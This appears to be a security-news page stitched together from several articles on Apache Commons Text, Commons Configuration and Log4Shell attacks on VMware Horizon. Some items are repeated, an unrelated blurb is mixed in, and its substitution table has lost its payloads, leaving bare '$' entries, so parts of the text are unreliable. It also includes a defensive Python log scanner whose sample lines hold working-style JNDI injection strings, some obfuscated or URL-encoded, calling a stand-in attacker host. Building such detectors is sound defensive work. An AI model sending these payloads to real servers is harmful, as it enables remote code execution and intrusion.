Security News
A freshly fixed vulnerability in the Apache Commons Text library has been getting attention from security researchers over the last few days, amid worries that it could lead to a repeat of the Log4Shell dumpster fire. The final verdict is that there's no need to panic: while the vulnerability is exploitable, "The nature of the vulnerability means that unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input," says Rapid7 AI researcher Erick Galinkin.
As you no doubt remember from Log4Shell, unnecessary "features" in the Apache logging library Log4J made this kind of substitution attack possible on any server running an unpatched version of Log4J. A user who claimed their name was $ , for example, would typically be logged by the Log4J code under the name of the server account doing the processing, if the app didn't first check the input data for dangerous characters.
Unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of your own security on top of Log4j, your software could come unstuck:

INPUT                      OUTCOME
-------------------------  -------------------------------------------
CURRENT=$ /$               CURRENT=Java version 17.0.1/Windows 10 10.0
Server account is: $       Server account is: root
$                          SECRETDATAINTENDEDTOBEINMEMORYONLY

Clearly, if you're accepting logging text from a trusted source, where it's reasonable to let the loggee control the logger by telling it to substitute chosen internal data for plain text, this sort of text rewriting is useful. The problem is that the same rewriting happens when the text comes from an untrusted source.
Well, the bug CVE-2022-33980, which doesn't have a catchy name yet, is a very similar sort of blunder in the Apache Commons Configuration toolkit. It is a separate bug from the Commons Text one above, although both come from the same kind of variable-interpolation feature. The name's quite a mouthful: Apache Commons is another Apache project, an umbrella for a large collection of Java utility libraries that provide a wide range of handy programming toolkits.
The Cybersecurity and Infrastructure Security Agency and Coast Guard Cyber Command released a joint advisory warning that the Log4Shell flaw is being abused by threat actors to compromise public-facing VMware Horizon and Unified Access Gateway servers. VMware Horizon is a platform administrators use to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to resources residing inside a network.
Attackers still exploit Log4Shell on VMware Horizon servers, CISA warns
If your organization is running VMware Horizon and Unified Access Gateway servers and you haven't implemented the patches or workarounds that fix or mitigate the Log4Shell vulnerability, available since December 2021, you should treat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency advised on Thursday. According to CISA, cyber threat actors, including state-sponsored advanced persistent threat actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations.
7 DevSecOps myths and how to overcome them
By including security and compliance processes in end-to-end automation, businesses can secure software throughout the whole software supply chain, significantly improve the developer experience, and accelerate safer delivery.
The U.S. Cybersecurity and Infrastructure Security Agency, along with the Coast Guard Cyber Command, on Thursday released a joint advisory warning of continued attempts by threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway (UAG) servers," the agencies said.
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway servers using the Log4Shell remote code execution vulnerability. Attackers exploit Log4Shell remotely on vulnerable servers reachable from the local network or the Internet, then move laterally across the network until they reach internal systems holding sensitive data.
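The lookup table earlier on this page and the CISA advisory above describe the same thing from two sides: untrusted text that contains a ${...} lookup gets expanded by Log4j (or by Commons Text and Commons Configuration, which share the interpolation idea). The following Python script is an added example, not code from any of the quoted articles or from the advisory, showing the detection side: it scans constructed log lines for lookup strings, undoes the obfuscations attackers use to slip past naive greps (URL encoding, ${lower:j}, ${::-j}), and flags the prefixes that matter. It goes beyond the page's own env: and java: examples by also covering the jndi:, script:, dns:, url: and file: lookups. The sample log lines, the 203.0.113.x addresses and the severity ranking are assumptions made for the example.

```python
"""Scan log lines for Log4j / Commons Text / Commons Configuration lookup strings.

Constructed example for this page; not code from any of the quoted articles.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Lookup prefixes worth alerting on, ranked by what they give an attacker.
# jndi: is the Log4Shell vector; script:, dns:, url: and file: are lookups
# Commons Text resolved by default before 1.10.0; env:, sys: and java: leak
# host details as in the table above (the ranking is an assumption).
SEVERITY = {
    "jndi": "critical", "script": "critical",
    "dns": "high", "url": "high", "file": "high",
    "env": "medium", "sys": "medium", "java": "medium",
}

# Innermost ${...} that contains no further braces.
LOOKUP_RE = re.compile(r"\$\{[^{}]*\}")
LOWER_RE = re.compile(r"\$\{lower:([^{}]*)\}")
UPPER_RE = re.compile(r"\$\{upper:([^{}]*)\}")
# ${key:-default}: an unresolvable key falls back to the default text, so
# ${::-j} and ${env:NOPE:-j} both collapse to the single letter j.
DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


@dataclass(frozen=True)
class Finding:
    line_no: int
    prefix: str     # normalised lookup prefix, e.g. "jndi"
    severity: str
    lookup: str     # the lookup as it reads after de-obfuscation


def decode(line: str) -> str:
    """Undo URL encoding (twice, for double-encoded payloads) so %24%7B becomes ${."""
    for _ in range(2):
        line = unquote(line)
    return line


def normalize(text: str) -> str:
    """Collapse the obfuscation tricks seen in the wild, innermost first, until stable."""
    prev = None
    while prev != text:
        prev = text
        text = LOWER_RE.sub(lambda m: m.group(1).lower(), text)
        text = UPPER_RE.sub(lambda m: m.group(1).upper(), text)
        text = DEFAULT_RE.sub(r"\1", text)
    return text


def scan_line(line_no: int, line: str) -> list[Finding]:
    """Return one Finding per risky lookup in a single log line."""
    text = normalize(decode(line))
    findings = []
    for m in LOOKUP_RE.finditer(text):
        body = m.group(0)[2:-1]
        prefix = body.split(":", 1)[0].strip().lower()
        if prefix in SEVERITY:
            findings.append(Finding(line_no, prefix, SEVERITY[prefix], m.group(0)))
    return findings


def scan(lines) -> list[Finding]:
    """Scan an iterable of log lines; line numbers start at 1."""
    findings = []
    for n, line in enumerate(lines, 1):
        findings.extend(scan_line(n, line))
    return findings


# Constructed sample: an access log for a fictional portal plus two app-log lines.
# Addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jun/2022:10:11:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Jun/2022:10:11:13 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [25/Jun/2022:10:11:14 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [25/Jun/2022:10:11:15 +0000] "GET /portal/info.jsp?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.81"',
    'user=alice note="Server account is: ${env:USER}"',
    'user=bob note="${script:javascript:1+1}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity:8} {f.lookup}")
```

Run against the sample, lines 2 to 6 are flagged and line 1 is not; the obfuscated User-Agent on line 3 comes out as ${jNdi:ldap://203.0.113.7:1389/b}, which is why the prefix is lower-cased before the severity lookup. The de-obfuscation is a heuristic: it handles the lower:, upper: and default-value tricks that dominated Log4Shell traffic, but a determined attacker can nest other lookups, so treat a hit as a reason to pull the full request and host telemetry rather than as the whole investigation.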
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to plant backdoors on VMware Horizon servers, which then fetch information-stealing payloads. According to a report published by analysts at AhnLab's ASEC, Lazarus has been targeting vulnerable VMware products via Log4Shell since April 2022.